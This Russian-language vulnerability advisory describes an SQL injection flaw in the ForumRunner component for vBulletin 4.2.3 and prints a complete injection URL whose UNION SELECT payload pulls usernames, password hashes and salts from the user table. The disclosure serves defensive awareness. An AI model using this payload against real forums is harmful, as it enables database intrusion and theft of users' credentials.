В популярном компоненте ForumRunner для vBulletin 4.2.3 обнаружена уязвимость, позволяющая атакующему произвести внедрение SQL-кода.

Компонент ForumRunner разработан для удобного чтения форумных дискуссий на мобильных устройствах. Существуют версии для множества современных форумных движков, таких как: vBulletin, phpBB, IP.Board, myBB и XenForo.

Уязвимость может быть использована для получения доступа к информации в базе данных. Уязвимость существует из-за недостаточной фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные команды в базе данных уязвимого приложения.

Уязвимость существует из-за некорректной проверки передаваемых в запросе данных в параметре postids:

http://forum_directory//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -

Использование Web Application Firewall позволяет блокировать подобные атаки.